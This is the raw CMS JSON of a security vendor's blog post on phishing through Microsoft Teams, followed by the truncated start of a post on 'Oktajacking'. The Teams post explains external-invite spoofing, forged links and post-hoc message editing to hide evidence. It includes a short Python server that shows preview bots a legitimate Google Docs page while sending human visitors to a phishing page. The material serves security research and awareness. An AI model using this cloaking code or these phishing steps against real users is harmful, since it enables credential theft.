success.",{"data":57868,"content":57869,"nodeType":860},{},[57870,57874,57883,57887,57896,57900,57909],{"data":57871,"marks":57872,"value":57873,"nodeType":864},{},[],"There’s been an uptick recently in IM-based phishing research and real-world attacks, particularly for Microsoft Teams. For example, check out the ",{"data":57875,"content":57877,"nodeType":883},{"uri":57876},"https://labs.jumpsec.com/advisory-idor-in-microsoft-teams-allows-for-external-tenants-to-introduce-malware/",[57878],{"data":57879,"marks":57880,"value":57882,"nodeType":864},{},[57881],{"type":1455},"great research from JumpSec",{"data":57884,"marks":57885,"value":57886,"nodeType":864},{},[]," on bypassing attachment protection for external Teams messages, the offensive tool ",{"data":57888,"content":57890,"nodeType":883},{"uri":57889},"https://github.com/Octoberfest7/TeamsPhisher",[57891],{"data":57892,"marks":57893,"value":57895,"nodeType":864},{},[57894],{"type":1455},"TeamsPhisher",{"data":57897,"marks":57898,"value":57899,"nodeType":864},{},[]," and attacks distributing ",{"data":57901,"content":57903,"nodeType":883},{"uri":57902},"https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-attack-pushes-darkgate-malware/",[57904],{"data":57905,"marks":57906,"value":57908,"nodeType":864},{},[57907],{"type":1455},"DarkGate malware via Teams",{"data":57910,"marks":57911,"value":2924,"nodeType":864},{},[],{"data":57913,"content":57917,"nodeType":996},{"target":57914},{"sys":57915},{"id":57916,"type":1001,"linkType":1002},"6iKFd9Qys2SSuNqKVQB7ka",[],{"data":57919,"content":57920,"nodeType":1009},{},[57921],{"data":57922,"marks":57923,"value":57924,"nodeType":864},{},[],"IM user spoofing",{"data":57926,"content":57927,"nodeType":860},{},[57928],{"data":57929,"marks":57930,"value":57931,"nodeType":864},{},[],"The first consideration is the spoofing aspect. We’ve all seen techniques for spoofing emails, but there are many security controls like Sender Policy Framework (SPF) that can prevent direct spoofing of domains and email security gateways that can flag suspicious domains.",{"data":57933,"content":57934,"nodeType":860},{},[57935],{"data":57936,"marks":57937,"value":57938,"nodeType":864},{},[],"Those security controls don’t exist for IM, so we have new options for spoofing.",{"data":57940,"content":57941,"nodeType":1312},{},[57942],{"data":57943,"marks":57944,"value":57945,"nodeType":864},{},[],"External IM invites",{"data":57947,"content":57948,"nodeType":860},{},[57949],{"data":57950,"marks":57951,"value":57952,"nodeType":864},{},[],"IM applications often make use of friendly display names for organization and employee names as well as user-chosen handles. These often don’t need to be unique either. One interesting aspect with Microsoft Teams is the behavior of this differs depending on if the external message request is received from a Teams organization or an individual Microsoft account user using Teams. ",{"data":57954,"content":57955,"nodeType":1312},{},[57956],{"data":57957,"marks":57958,"value":57959,"nodeType":864},{},[],"External invite from individual Microsoft account",{"data":57961,"content":57962,"nodeType":860},{},[57963],{"data":57964,"marks":57965,"value":57966,"nodeType":864},{},[],"When messaging from an individual Microsoft account, we can choose the name to represent ourselves but we can’t choose an organization name. ",{"data":57968,"content":57969,"nodeType":860},{},[57970],{"data":57971,"marks":57972,"value":57973,"nodeType":864},{},[],"This is somewhat neutral in this case as we can’t spoof a legitimate organization name but the invite doesn’t show the real email address of the attacker’s account in this case and simply displays “External” as an indicator. Additionally, when messages are received from the external user the profile photo shown by the user does not show so we can’t spoof a known profile photo either.",{"data":57975,"content":57979,"nodeType":996},{"target":57976},{"sys":57977},{"id":57978,"type":1001,"linkType":1002},"zILCczBEC70U7rZCdQKTL",[],{"data":57981,"content":57985,"nodeType":996},{"target":57982},{"sys":57983},{"id":57984,"type":1001,"linkType":1002},"2JK0JDCZyPMF4btzGnFFHs",[],{"data":57987,"content":57988,"nodeType":1312},{},[57989],{"data":57990,"marks":57991,"value":57992,"nodeType":864},{},[],"External invite from Teams organization",{"data":57994,"content":57995,"nodeType":860},{},[57996],{"data":57997,"marks":57998,"value":57999,"nodeType":864},{},[],"On the other hand, if we initiate an external connection request from a Teams organization then we can control our organization name but this is not of use to us in this case. This is because the connection request actually shows the email address of the user account. Therefore, we need to register a convincing email domain and we are relegated back to something much closer to standard email social engineering techniques.",{"data":58001,"content":58005,"nodeType":996},{"target":58002},{"sys":58003},{"id":58004,"type":1001,"linkType":1002},"7anwp3Aogq28Gfl31m57Sp",[],{"data":58007,"content":58008,"nodeType":860},{},[58009],{"data":58010,"marks":58011,"value":58012,"nodeType":864},{},[],"In this case, it seems better to use an individual Microsoft account with teams to spoof external invites as it’s not easy for a target user to tell if the user or organization requesting to connect is legitimate when they first receive this invitation. ",{"data":58014,"content":58015,"nodeType":860},{},[58016],{"data":58017,"marks":58018,"value":58019,"nodeType":864},{},[],"Whatever method is used, there’s also a curiosity incentive - you can’t see a first message from the user, so it’s tempting for the target user to accept in order to see the message, even if they then ignore it. This is one case where Teams actually provides an interesting defensive ability - it’s possible for the user to preview the message that has been sent without formally accepting the invitation first.",{"data":58021,"content":58022,"nodeType":860},{},[58023],{"data":58024,"marks":58025,"value":58026,"nodeType":864},{},[],"Whilst the initial invite spoofing options with Teams are not ideal from an attacker’s perspective (Slack certainly provides more interesting spoofing capabilities) there are certainly options to experiment with and it still allows for some capabilities not possible with email spoofing, such as hiding the email address and showing a display name only.",{"data":58028,"content":58029,"nodeType":860},{},[58030],{"data":58031,"marks":58032,"value":58033,"nodeType":864},{},[],"However, all an attacker needs to do is get a first connection and they have cleared the first hurdle. They can now launch attacks either immediately or in future. The conversational nature of IM apps makes it much easier to ramp up the conversation gradually towards an actual attack using a malicious link or attachment that is more likely to succeed.",{"data":58035,"content":58036,"nodeType":1009},{},[58037],{"data":58038,"marks":58039,"value":58040,"nodeType":864},{},[],"Link preview spoofing",{"data":58042,"content":58043,"nodeType":860},{},[58044,58048,58053,58057,58062],{"data":58045,"marks":58046,"value":58047,"nodeType":864},{},[],"Another key issue is link preview spoofing. HTML allows a variety of ways to specify hyperlinks. In email, secure email gateways will often alert or block commonly abused types, such as forging a different URL as the link display text to what the underlying link points to. For example, an attacker could show the link as ",{"data":58049,"marks":58050,"value":58052,"nodeType":864},{},[58051],{"type":1455},"https://www.google.com",{"data":58054,"marks":58055,"value":58056,"nodeType":864},{},[]," but direct it to ",{"data":58058,"marks":58059,"value":58061,"nodeType":864},{},[58060],{"type":1455},"https://www.evil.com",{"data":58063,"marks":58064,"value":58065,"nodeType":864},{},[]," when it is clicked. Secure email gateways often perform a lot of other analysis of links, including domain analysis and active crawling to identify common phishing attacks.",{"data":58067,"content":58068,"nodeType":860},{},[58069],{"data":58070,"marks":58071,"value":58072,"nodeType":864},{},[],"On IM applications, however, this same standard of link analysis is not always present and the widespread introduction of link unfurling/previewing has also given additional options for spoofing links to hide their true source and increase social engineering success. ",{"data":58074,"content":58075,"nodeType":1312},{},[58076],{"data":58077,"marks":58078,"value":58079,"nodeType":864},{},[],"Traditional link forging",{"data":58081,"content":58082,"nodeType":860},{},[58083],{"data":58084,"marks":58085,"value":58086,"nodeType":864},{},[],"We’ll start with a common traditional link forging scenario to see how Teams handles that, then show how link previews change the threat.",{"data":58088,"content":58089,"nodeType":860},{},[58090],{"data":58091,"marks":58092,"value":58093,"nodeType":864},{},[],"Here, we can see forging a link is permitted by Teams. A hover-over for a few seconds will show the real URL, but there is nothing stopping an attacker forging fake links if the user just clicks them without checking. This is something commonly prevented by secure email gateways and is something that generates an explicit warning when performed using Slack.",{"data":58095,"content":58099,"nodeType":996},{"target":58096},{"sys":58097},{"id":58098,"type":1001,"linkType":1002},"6WhYD92zZfMp9BqVdDD7oo",[],{"data":58101,"content":58102,"nodeType":860},{},[58103],{"data":58104,"marks":58105,"value":58106,"nodeType":864},{},[],"We can of course use friendly text to construct a link to our malicious domain too, something often used in email-based phishing. However, it still shows the real URL on hover-over and so it’s arguably of less use in teams when we can straight up forge fake links. A user is much less likely to check the hover-over if they think they’ve already seen the real URL as in the case of the forged link shown previously.",{"data":58108,"content":58112,"nodeType":996},{"target":58109},{"sys":58110},{"id":58111,"type":1001,"linkType":1002},"18Ziitk77uqffkzcPMAU48",[],{"data":58114,"content":58115,"nodeType":1312},{},[58116],{"data":58117,"marks":58118,"value":58119,"nodeType":864},{},[],"Abusing link previews",{"data":58121,"content":58122,"nodeType":860},{},[58123],{"data":58124,"marks":58125,"value":58126,"nodeType":864},{},[],"It gets more interesting when we use links that Teams is able to unfurl to provide a link preview. Here we’ll show a legitimate example of posting one of our own blogs where Teams helpfully unfurls the URL and gives some context to the link as a preview:",{"data":58128,"content":58132,"nodeType":996},{"target":58129},{"sys":58130},{"id":58131,"type":1001,"linkType":1002},"2Zur3eM6QgogohMAO9bpZ7",[],{"data":58134,"content":58135,"nodeType":860},{},[58136],{"data":58137,"marks":58138,"value":58139,"nodeType":864},{},[],"This is very useful for the user and, despite the fact you can still see the domain as part of the preview, the rest of the preview dominates the display and gives a sense of legitimacy. The user can also hover-over the link to see the full URL, but they have much less reason to do that when seeing the link preview and if they notice the domain that’s displayed too.",{"data":58141,"content":58142,"nodeType":860},{},[58143],{"data":58144,"marks":58145,"value":58147,"nodeType":864},{},[58146],{"type":899},"So, how can we use this scenario maliciously?",{"data":58149,"content":58150,"nodeType":860},{},[58151],{"data":58152,"marks":58153,"value":58154,"nodeType":864},{},[],"The obvious attack scenario is to forge a different link preview for Teams than what is given to the user when they click the link. Then when the user clicks the link, they’ll be directed to our phishing page instead. ",{"data":58156,"content":58157,"nodeType":860},{},[58158],{"data":58159,"marks":58160,"value":58161,"nodeType":864},{},[],"We can do this by performing user agent specific processing of web requests. For example, Teams unfurling uses a user agent like the following:",{"data":58163,"content":58167,"nodeType":996},{"target":58164},{"sys":58165},{"id":58166,"type":1001,"linkType":1002},"703zjwvTs3DGZwkerIx9G8",[],{"data":58169,"content":58170,"nodeType":860},{},[58171],{"data":58172,"marks":58173,"value":58174,"nodeType":864},{},[],"Therefore, without even requiring much sophistication, we can use some simple python code to perform a redirect to a legitimate source when our web request handler sees this user agent. However, when a target user visits using a normal web browser we instead return a malicious page. The example python code below redirects to benign content for a Teams preview, while serving malicious content otherwise:",{"data":58176,"content":58180,"nodeType":996},{"target":58177},{"sys":58178},{"id":58179,"type":1001,"linkType":1002},"5W64wjVFHtjscIMWNQvFAT",[],{"data":58182,"content":58183,"nodeType":860},{},[58184],{"data":58185,"marks":58186,"value":58187,"nodeType":864},{},[],"If you’ve read our previous Slack article, you’ll recall that we also minimized the link text to a period so as to reduce the chances of the user performing a hover-over to see the real URL, whereas the link preview itself is much larger and clickable. ",{"data":58189,"content":58190,"nodeType":860},{},[58191],{"data":58192,"marks":58193,"value":58194,"nodeType":864},{},[],"The problem with Teams is that the domain portion of the link shows as part of the link preview as we saw above, which isn’t ideal as an attacker. Obviously, in a real attack we would register as convincing a domain as we could but we’d still rather the user either does not see it or sees a genuinely legitimate domain instead.",{"data":58196,"content":58197,"nodeType":860},{},[58198],{"data":58199,"marks":58200,"value":58201,"nodeType":864},{},[],"However, we also saw before that, unlike Slack, Teams allows full link forging without a warning. Hyperlinks are blue highlighted and much more prominent and so our attack strategy is best focused on presenting a forged legitimate URL that draws the user’s attention, along with a forged link preview and distracting them from the faded real domain that shows below.",{"data":58203,"content":58204,"nodeType":860},{},[58205],{"data":58206,"marks":58207,"value":58208,"nodeType":864},{},[],"The end result of this is that the user sees both a legitimate URL and a nice friendly link preview legitimately produced by Teams and Google Docs in real time, whereas if they click the link they’ll be taken to our phishing page instead. ",{"data":58210,"content":58211,"nodeType":860},{},[58212],{"data":58213,"marks":58214,"value":58215,"nodeType":864},{},[],"In this case, we have shown a Google style phishing page as an example for harvesting credentials. Hopefully, the user will assume their Google Docs session expired and then re-enter their credentials. See what the target user would see below:",{"data":58217,"content":58221,"nodeType":996},{"target":58218},{"sys":58219},{"id":58220,"type":1001,"linkType":1002},"46ZtHG4bp9bCdiCmmvciee",[],{"data":58223,"content":58227,"nodeType":996},{"target":58224},{"sys":58225},{"id":58226,"type":1001,"linkType":1002},"12F0HcFMo5Yd3rSaDX3W7q",[],{"data":58229,"content":58230,"nodeType":860},{},[58231],{"data":58232,"marks":58233,"value":58234,"nodeType":864},{},[],"As we can see, the phishing message generated in this case is pretty convincing. It shows a legitimate link to Google docs that is highlighted and a legitimate link preview too. The faded ngrok domain in the link preview is very easy to miss. However, clicking the link will take the user to our phishing page.",{"data":58236,"content":58237,"nodeType":860},{},[58238],{"data":58239,"marks":58240,"value":58241,"nodeType":864},{},[],"The diagram below shows how this attack works from a data flow perspective:",{"data":58243,"content":58247,"nodeType":996},{"target":58244},{"sys":58245},{"id":58246,"type":1001,"linkType":1002},"1Tv7cohtgUhXpYWiZdmw8J",[],{"data":58249,"content":58250,"nodeType":1009},{},[58251],{"data":58252,"marks":58253,"value":58254,"nodeType":864},{},[],"Cleaning you tracks",{"data":58256,"content":58257,"nodeType":860},{},[58258],{"data":58259,"marks":58260,"value":58261,"nodeType":864},{},[],"Ok, so let’s say an attacker has either successfully phished the target user or perhaps now the user is suspicious and likely contacting security or IT. One of the great benefits of IM apps is you can generally edit and delete messages, which can be abused by an attacker.",{"data":58263,"content":58264,"nodeType":860},{},[58265],{"data":58266,"marks":58267,"value":58268,"nodeType":864},{},[],"As an attacker, I could make a tiny change to my message to replace the malicious link with the legitimate link I was spoofing for the link preview if I got the sense the target was getting suspicious. Then, if an incident responder comes to investigate, the malicious link is now gone and the message itself appears almost identical, covering my tracks. Other than being able to see the message has been edited, it’s no longer easy to see this was a phishing attack or where the phishing link pointed to. ",{"data":58270,"content":58271,"nodeType":860},{},[58272],{"data":58273,"marks":58274,"value":58275,"nodeType":864},{},[],"This is definitely a useful capability that isn’t usually possible with email phishing! See this minor change reflected below, making the original phishing message appear innocuous due to the replacement of the phishing URL with a legitimate URL. A careful observer will notice that the message appears almost identical to the original, only now the faded domain in the link preview shows docs.google.com, instead of our malicious domain, since the link has been edited.",{"data":58277,"content":58281,"nodeType":996},{"target":58278},{"sys":58279},{"id":58280,"type":1001,"linkType":1002},"7prJ4j2AdLrcKXOJQU5mPp",[],{"data":58283,"content":58284,"nodeType":1009},{},[58285],{"data":58286,"marks":58287,"value":58288,"nodeType":864},{},[],"Impact",{"data":58290,"content":58291,"nodeType":860},{},[58292],{"data":58293,"marks":58294,"value":58295,"nodeType":864},{},[],"We’ve covered a lot of ground here, showing the chaining of external user spoofing attacks with link preview spoofing and also how to cover your tracks afterwards. It’s worth taking a step back and considering the key impact points:",{"data":58297,"content":58298,"nodeType":941},{},[58299,58309,58319,58329],{"data":58300,"content":58301,"nodeType":945},{},[58302],{"data":58303,"content":58304,"nodeType":860},{},[58305],{"data":58306,"marks":58307,"value":58308,"nodeType":864},{},[],"IM apps like Teams are now external phishing and social engineering vectors, not just internal ones",{"data":58310,"content":58311,"nodeType":945},{},[58312],{"data":58313,"content":58314,"nodeType":860},{},[58315],{"data":58316,"marks":58317,"value":58318,"nodeType":864},{},[],"User spoofing can be used in novel ways to enhance social engineering that employees may not be familiar with",{"data":58320,"content":58321,"nodeType":945},{},[58322],{"data":58323,"content":58324,"nodeType":860},{},[58325],{"data":58326,"marks":58327,"value":58328,"nodeType":864},{},[],"Link spoofing techniques can make phishing links much harder to spot and so increase social engineering success",{"data":58330,"content":58331,"nodeType":945},{},[58332],{"data":58333,"content":58334,"nodeType":860},{},[58335],{"data":58336,"marks":58337,"value":58338,"nodeType":864},{},[],"Malicious Teams messages can be modified later to replace the phishing link to cover up the attack",{"data":58340,"content":58341,"nodeType":1009},{},[58342],{"data":58343,"marks":58344,"value":24968,"nodeType":864},{},[],{"data":58346,"content":58347,"nodeType":860},{},[58348],{"data":58349,"marks":58350,"value":58351,"nodeType":864},{},[],"IM apps have become the default internal communication for most organizations now, but are now a common method of communication with external parties, as well. This means they’ll become a key battleground in both the initial access phase of compromises and the latter phases of lateral movement and persistence. ",{"data":58353,"content":58354,"nodeType":860},{},[58355],{"data":58356,"marks":58357,"value":58358,"nodeType":864},{},[],"This also means organizations reliant on traditional email security gateways and email-based phishing training are likely to see the effectiveness of these controls decrease if attacks shift to the IM apps.",{"data":58360,"content":58361,"nodeType":860},{},[58362],{"data":58363,"marks":58364,"value":58365,"nodeType":864},{},[],"In this article, we highlighted a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams in the initial access phase of the kill chain.",{"data":58367,"content":58371,"nodeType":996},{"target":58368},{"sys":58369},{"id":58370,"type":1001,"linkType":1002},"2y0INxqAi594O7rCAVKhTI",[],{"data":58373,"content":58374,"nodeType":860},{},[58375],{"data":58376,"marks":58377,"value":21,"nodeType":864},{},[],{"entries":58379},{"inline":58380,"hyperlink":58381,"block":58390},[],[58382,58386],{"sys":58383,"__typename":2059,"title":58384,"slug":58385},{"id":57693},"Slack Attack: A phisher's guide to initial access","slack-phishing-for-initial-access",{"sys":58387,"__typename":2059,"title":58388,"slug":58389},{"id":57717},"Slack Attack: A phisher's guide to persistence and lateral movement","phishing-slack-persistence",[58391,58396,58404,58411,58418,58425,58430,58437,58442,58447,58454,58461,58467,58472],{"sys":58392,"__typename":1717,"type":58393,"ctaText":58394,"buttonLabel":58395,"buttonColour":1721,"buttonUrl":59},{"id":57916},"Demo","Learn how Push can help you secure identities across your org","Book a demo!",{"sys":58397,"__typename":1724,"title":58398,"caption":58399,"layoutMode":59,"file":58400},{"id":57978},"Teams invite from an external user","Teams invite from an external user with an attacker chosen username",{"url":58401,"width":58402,"height":58403},"https://images.ctfassets.net/y1cdw1ablpvd/41BM40X0zR7GLT9augEWse/20c8c47ae602252dc5ad04f03dbd5791/Teams_invite_from_an_external_user.png",677,611,{"sys":58405,"__typename":1724,"title":58406,"caption":58406,"layoutMode":59,"file":58407},{"id":57984},"Rendering of the attacker chosen name from an external user",{"url":58408,"width":58409,"height":58410},"https://images.ctfassets.net/y1cdw1ablpvd/Ea6mrq6bzXvD3RcD63kWR/a2bdd1fe10a412d5bb4a50792900958a/Rendering_of_the_attacker_chosen_name.png",584,147,{"sys":58412,"__typename":1724,"title":58413,"caption":58413,"layoutMode":59,"file":58414},{"id":58004},"Teams invite from a user from an external Teams organization - note email shows",{"url":58415,"width":58416,"height":58417},"https://images.ctfassets.net/y1cdw1ablpvd/vM7Bwt93lImxESrXbILv7/6dfe4d01f9025e5eea207b8905e01d1b/Teams_invite_from_a_user_from_an_external_Teams_organization.png",804,718,{"sys":58419,"__typename":1724,"title":58420,"caption":58420,"layoutMode":59,"file":58421},{"id":58098},"Link forging shows the real domain on a hover-over, but is otherwise permitted",{"url":58422,"width":58423,"height":58424},"https://images.ctfassets.net/y1cdw1ablpvd/6ggeHuKDrHgIpQetUprgHq/5e89fe2a3340810730411617fca737f6/Link_forging_shows_the_real_domain_on_a_hover-over.png",482,134,{"sys":58426,"__typename":1724,"title":58427,"caption":58427,"layoutMode":59,"file":58428},{"id":58111},"A hover-over still shows the true URL with a friendly text link",{"url":58429,"width":58423,"height":58424},"https://images.ctfassets.net/y1cdw1ablpvd/3mCc91OKYETyhLSOFiTd3W/bec7b7cc4bdbcd5d7bb31e6917916f38/A_hover_over_friendly_text_link.png",{"sys":58431,"__typename":1724,"title":58432,"caption":58432,"layoutMode":59,"file":58433},{"id":58131},"Link unfurling resulting in a helpful link preview ",{"url":58434,"width":58435,"height":58436},"https://images.ctfassets.net/y1cdw1ablpvd/CG1C7iH9rbdOma5CqoE0D/347d201afe66a89e1494f75f5bb20be8/unfurling.png",554,183,{"sys":58438,"__typename":51481,"name":58439,"type":58440,"syntax":58441},{"id":58166},"Blog > Code > Phishing Microsoft Teams for initial access #1","markup","User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com",{"sys":58443,"__typename":51481,"name":58444,"type":58445,"syntax":58446},{"id":58179},"Blog > Code > Phishing Microsoft Teams for initial access #2","python","from http.server import HTTPServer, SimpleHTTPRequestHandler\n\n\nclass MyHandler(SimpleHTTPRequestHandler):\n    def do_GET(self):\n        for header, val in self.headers.items():\n            if header == \"User-Agent\":\n                print(header, val)\n                if val.startswith(\"Slackbot-LinkExpanding\") or \"SkypeUriPreview\" in val or \"Google-PageRenderer\" in val:\n                    self.send_response(301)\n                    self.send_header('Location', 'https://docs.google.com/presentation/d/1JsjD2Ro9KaHmW2vILPKJ6-7ptW89pfsAReyzCxQdpq0/edit?usp=sharing')\n                    self.end_headers()\n                    return\n            print(header, val)\n        return super(MyHandler, self).do_GET()\n\n\nhttpd = HTTPServer(('localhost', 8000), MyHandler)\nhttpd.serve_forever()\n",{"sys":58448,"__typename":1724,"title":58449,"caption":58449,"layoutMode":59,"file":58450},{"id":58220},"Phishing message making use of user spoofing and link preview spoofing to make the link seem legitimate",{"url":58451,"width":58452,"height":58453},"https://images.ctfassets.net/y1cdw1ablpvd/2HZqHpcwUFOaOSaeUbk1rx/119597868eaee6982e3f5510e2ed8caa/Phishing_message.png",857,205,{"sys":58455,"__typename":1724,"title":58456,"caption":58456,"layoutMode":59,"file":58457},{"id":58226},"The fake Google phishing page the user is directed to when clicking the link, in this case hosted on a custom ngrok domain",{"url":58458,"width":58459,"height":58460},"https://images.ctfassets.net/y1cdw1ablpvd/5dueTUJMn1lFQa7mwIVFca/4bf1fd95291ea188bd740faadf2f4411/fake_Google_phishing_page.png",1718,1560,{"sys":58462,"__typename":1724,"title":58463,"caption":59,"layoutMode":59,"file":58464},{"id":58246},"How this attack works from a data flow perspective",{"url":58465,"width":58466,"height":48494},"https://images.ctfassets.net/y1cdw1ablpvd/1oFP5nagW2OSROK6ckicc6/3af9c8d6662b3db9aac0769e353414df/Updated-Teams.png",2560,{"sys":58468,"__typename":1724,"title":58469,"caption":58469,"layoutMode":59,"file":58470},{"id":58280},"An edited message to remove the malicious link and replace it with the same link used for spoofed link preview.",{"url":58471,"width":58452,"height":58453},"https://images.ctfassets.net/y1cdw1ablpvd/1a5WPjras9dNqxiw3Yrz8m/8ef6fa561ae343916eb9d5bf576dcb77/Phishing_message_edited.png",{"sys":58473,"__typename":1717,"type":58474,"ctaText":58475,"buttonLabel":58476,"buttonColour":56131,"buttonUrl":59},{"id":58370},"LinkedIn","See more original research and technical content from Push","Follow us on LinkedIn",{"items":58478},[],{},"How attackers go phishing on Microsoft Teams","2024-01-23T00:00:00.000Z",{"items":58483},[],"phishing-microsoft-teams-for-initial-access","blog/phishing-microsoft-teams-for-initial-access",{"json":58487},{"data":58488,"content":58489,"nodeType":856},{},[58490],{"data":58491,"content":58492,"nodeType":860},{},[58493],{"data":58494,"marks":58495,"value":58496,"nodeType":864},{},[],"In this article, we will highlight a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams in the initial access phase of the kill chain.","In this article, we will cover a number of spoofing and phishing strategies that can be employed by external attackers to target an organization using Teams.\n",{"id":58499,"publishedAt":58500},"2cv7Yq1DQpm1Mho7fKDs44","2026-08-12T11:55:39.663Z",{"items":58502},[58503,58505],{"sys":58504,"name":6593},{"id":6592},{"sys":58506,"name":297},{"id":2732},{"items":58508},[58509,58511,58513,58515,58517,58519,58521,58523,58525],{"sys":58510,"name":279,"slug":280,"tier":31},{"id":276},{"sys":58512,"name":519,"slug":520,"tier":31},{"id":516},{"sys":58514,"name":413,"slug":414,"tier":31},{"id":410},{"sys":58516,"name":297,"slug":298,"tier":31},{"id":294},{"sys":58518,"name":607,"slug":608,"tier":45},{"id":604},{"sys":58520,"name":324,"slug":325,"tier":45},{"id":321},{"sys":58522,"name":475,"slug":476,"tier":45},{"id":472},{"sys":58524,"name":448,"slug":449,"tier":45},{"id":445},{"sys":58526,"name":431,"slug":432,"tier":45},{"id":428},"mSeA7VddPhh37XtDnGnrKx4mAaDuD5Xh2TBH5LYCKq0",{"id":58529,"title":58530,"authorsCollection":58531,"content":58536,"extension":228,"faqItemsCollection":59186,"faqTitle":59,"featured":6,"hashTags":59,"meta":59188,"metaTitle":59189,"ogImage":59,"postType":5740,"publishedDate":59190,"relatedBlogPostsCollection":59191,"slug":61754,"stem":61755,"subtitle":59189,"summary":61756,"synopsis":61767,"sys":61768,"tagsCollection":61771,"topicsCollection":61777,"__hash__":61799},"blog/blog/oktajacking.json","Oktajacking",{"items":58532},[58533],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":58534,"profilePicture":58535},[4953],{"url":4955},{"json":58537,"links":59145},{"data":58538,"content":58539,"nodeType":856},{},[58540,58559,58566,58573,58590,58597,58615,58622,58629,58662,58669,58676,58683,58690,58723,58728,58734,58753,58760,58767,58774,58807,58814,58821,58828,58845,58851,58857,58863,58870,58891,58898,58905,58912,58919,58982,58989,59032,59039,59045,59052,59067,59072,59078,59085,59118,59124,59131,59138],{"data":58541,"content":58542,"nodeType":860},{},[58543,58547,58555],{"data":58544,"marks":58545,"value":58546,"nodeType":864},{},[],"We have spoken previously about ",{"data":58548,"content":58549,"nodeType":883},{"uri":5231},[58550],{"data":58551,"marks":58552,"value":58554,"nodeType":864},{},[58553],{"type":1455},"SAMLjacking and poisoned tenants",{"data":58556,"marks":58557,"value":58558,"nodeType":864},{},[],", particularly with regard to clever phishing attacks aimed at gaining initial access to some cloud identities. Today, we’ll look at how Okta’s AD synchronization is pretty much SAMLjacking on steroids. We’ll also consider how it can be used as a stealthy watering-hole style lateral movement attack too.",{"data":58560,"content":58561,"nodeType":860},{},[58562],{"data":58563,"marks":58564,"value":58565,"nodeType":864},{},[],"To be clear, this isn't a vulnerability in Okta that circumvents a security boundary and needs to be patched. This is offensive use of a product feature, the SaaS version of living off the land (LOTL). Let's call it living off the cloud (LOTC).",{"data":58567,"content":58568,"nodeType":1009},{},[58569],{"data":58570,"marks":58571,"value":58572,"nodeType":864},{},[],"What is SAMLjacking?",{"data":58574,"content":58575,"nodeType":860},{},[58576,58579,58586],{"data":58577,"marks":58578,"value":21,"nodeType":864},{},[],{"data":58580,"content":58581,"nodeType":883},{"uri":40614},[58582],{"data":58583,"marks":58584,"value":5272,"nodeType":864},{},[58585],{"type":1455},{"data":58587,"marks":58588,"value":58589,"nodeType":864},{},[]," is where an attacker makes use of SAML SSO configuration settings for a SaaS tenant they control in order to redirect users to a malicious link during the authentication process. This can be highly effective for phishing, as the original URL will be a legitimate SaaS URL and users will provide their credentials because they’re expecting that as part of the login process. ",{"data":58591,"content":58592,"nodeType":1009},{},[58593],{"data":58594,"marks":58595,"value":58596,"nodeType":864},{},[],"What is a poisoned tenant?",{"data":58598,"content":58599,"nodeType":860},{},[58600,58603,58611],{"data":58601,"marks":58602,"value":21,"nodeType":864},{},[],{"data":58604,"content":58606,"nodeType":883},{"uri":58605},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md",[58607],{"data":58608,"marks":58609,"value":58610,"nodeType":864},{},[],"Poisoned tenants",{"data":58612,"marks":58613,"value":58614,"nodeType":864},{},[]," involve an adversary registering a tenant for a SaaS app they control and tricking target users to join it, often using built-in invite functionality. The end goal is to have some target users actively using a tenant you (as the adversary) control.",{"data":58616,"content":58617,"nodeType":1009},{},[58618],{"data":58619,"marks":58620,"value":58621,"nodeType":864},{},[],"What is Oktajacking?",{"data":58623,"content":58624,"nodeType":860},{},[58625],{"data":58626,"marks":58627,"value":58628,"nodeType":864},{},[],"This is a name I’ve been using to refer to using Okta to do the credential capture/keylogging for you, without needing to have your own malicious domain hosting your malicious SAML server. This is even more effective than regular SAMLjacking as the user will only ever see legitimate SaaS domains, with the subdomain being the attacker-chosen part (e.g. https://attacker-tenant.okta.com).",{"data":58630,"content":58631,"nodeType":860},{},[58632,58636,58645,58649,58658],{"data":58633,"marks":58634,"value":58635,"nodeType":864},{},[],"However, the awesome research that underpins this technique was conducted by Adam Chester (",{"data":58637,"content":58639,"nodeType":883},{"uri":58638},"https://twitter.com/_xpn_",[58640],{"data":58641,"marks":58642,"value":58644,"nodeType":864},{},[58643],{"type":1455},"@_xpn_",{"data":58646,"marks":58647,"value":58648,"nodeType":864},{},[],") and is covered in his excellent article, ",{"data":58650,"content":58652,"nodeType":883},{"uri":58651},"https://blog.xpnsec.com/okta-for-redteamers/",[58653],{"data":58654,"marks":58655,"value":58657,"nodeType":864},{},[58656],{"type":1455},"Okta for Red Teamers",{"data":58659,"marks":58660,"value":58661,"nodeType":864},{},[],". If you haven’t already read that, you absolutely should. ",{"data":58663,"content":58664,"nodeType":860},{},[58665],{"data":58666,"marks":58667,"value":58668,"nodeType":864},{},[],"Adam identified that if you compromise a Windows domain that’s linked to Okta and/or compromise an Okta admin account for an Okta instance linked to a Windows domain, you can use the Okta AD agent to capture credentials during logins. There’s lots more, but that’s the key part we’ll build upon for this article. ",{"data":58670,"content":58671,"nodeType":860},{},[58672],{"data":58673,"marks":58674,"value":58675,"nodeType":864},{},[],"This attack works because Okta forwards credentials from logins for accounts tied to AD to its own AD agent that runs on the target network. Then, Okta allows the agent to report back to them about whether the login should be successful or not. This enables an attacker who has compromised an AD agent, or is able to emulate one, to both monitor login credentials for Okta users and provide skeleton key-like functionality to authenticate to Okta as any user they like. ",{"data":58677,"content":58678,"nodeType":860},{},[58679],{"data":58680,"marks":58681,"value":58682,"nodeType":864},{},[],"The context of this in Adam’s article was primarily a traditional Windows domain compromise scenario where an attacker could use this method as a form of incredibly powerful domain-level persistence or to move laterally to other accounts. This is applicable in late-stage kill chain phases, where the attacker has already achieved a total organization-level compromise. ",{"data":58684,"content":58685,"nodeType":860},{},[58686],{"data":58687,"marks":58688,"value":58689,"nodeType":864},{},[],"So, how can this technique be leveraged earlier in the kill chain? We’ll consider the following two scenarios for this article:",{"data":58691,"content":58692,"nodeType":941},{},[58693,58708],{"data":58694,"content":58695,"nodeType":945},{},[58696],{"data":58697,"content":58698,"nodeType":860},{},[58699,58704],{"data":58700,"marks":58701,"value":58703,"nodeType":864},{},[58702],{"type":899},"Oktajacking for initial access",{"data":58705,"marks":58706,"value":58707,"nodeType":864},{},[]," - directly phishing credentials via a valid Okta tenant we 